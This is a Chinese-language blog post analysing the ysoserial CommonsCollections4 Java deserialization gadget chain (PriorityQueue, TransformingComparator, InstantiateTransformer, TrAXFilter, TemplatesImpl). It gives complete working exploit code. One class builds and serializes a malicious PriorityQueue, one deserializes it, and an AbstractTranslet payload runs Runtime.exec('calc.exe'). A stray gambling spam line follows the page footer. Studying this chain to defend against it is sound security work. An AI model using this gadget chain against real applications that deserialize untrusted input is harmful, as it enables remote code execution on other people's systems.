java反序列化-ysoserial-調試分析總結篇(4)

1.前言

這篇文章繼續分析commoncollections4利用鏈,這篇文章是對cc2的改造,和cc3一樣,cc3是對cc1的改造,cc4則是對cc2的改造,里面chained的invoke變成了instantiateTransformer,所以不用invoke反射調用方法,所以外層queue里面放的元素隨意

縮減版的函數調用棧如下圖所示:

2.利用鏈分析:

調用還是從PriorityQueue.readObject函數開始

一直到org/apache/commons/collections4/comparators/TransformingComparator.class的compare函數中將調用chainedTransformer的transform方法了

這里第一個要利用的還是ConstantTransformer,要返回TrAXfilter類

接下來第二輪將調用Traxfilter類入口參數類型為Templates的構造函數,并且實例化調用該構造函數傳入templatesImpl類的實例

接下來到TraxFilter的構造函數中將調用templatesImpl.newTransformer(),就可以是實例化_bytecode中存儲的類進行rce了

 

 yso構造分析:

 

 

 首先構造一個Templates類的實例,然后開始構造chianed鏈需要的東西,首先就是一個Constanttransformer

然后再構造chained的第二個元素就是該鏈相對于cc2的區別為InstantiateTransformer類

接下來將兩個transformer放進chaind,并且構造外層的PriorityQueue,并將chined放入TransformingComparator,然后再將Templates放到instantiate實例的參數和參數類型中,至此

就構造結束了

手動exp構造:

 exp.java

package CommonsCollections4;
import  com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.*;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.ComparableComparator;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;



import javax.xml.transform.Templates;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class exp {
    public static void main(String[] args) throws IOException, CannotCompileException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException, NotFoundException {
        TemplatesImpl tmp = new TemplatesImpl();
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(payload.class));

        CtClass pay_class = pool.get(payload.class.getName());
        byte[] payCode = pay_class.toBytecode();
        Class clazz;
        clazz =Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
        //存儲payload類
        Field byteCode = clazz.getDeclaredField("_bytecodes");
        byteCode.setAccessible(true);
        byteCode.set(tmp,new byte[][]{payCode});
        Field name  = clazz.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(tmp,"tr1ple");

        Transformer[] trans = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(
                        new Class[]{Templates.class},
                        new Object[]{tmp})
        };


        ChainedTransformer chian = new ChainedTransformer(trans);
        //PriorityQueue<Object> queue = new PriorityQueue(2,new TransformingComparator(chian));
        TransformingComparator transCom = new TransformingComparator(chian);

        PriorityQueue queue = new PriorityQueue(2);
        queue.add(1);
        queue.add(1);


        Field com = PriorityQueue.class.getDeclaredField("comparator");
        com.setAccessible(true);
        com.set(queue,transCom);

        //序列化
        File file;
        file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections4.ser");
        ObjectOutputStream obj_out = new ObjectOutputStream(new FileOutputStream(file));
        obj_out.writeObject(queue);

    }
}

readobj.java

package CommonsCollections4;

import java.io.*;
import java.lang.Runtime;

public class readObj {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        File file;
        file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections4.ser");
        ObjectInputStream obj = new ObjectInputStream(new FileInputStream(file));
        obj.readObject();
    }
}

payload.java

package CommonsCollections4;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class payload extends AbstractTranslet {
    {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    public payload(){
        System.out.println("tr1ple 2333");
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

 

 


posted @ 2020-03-03 22:29  tr1ple  閱讀(...)  評論(...編輯  收藏
ag二分彩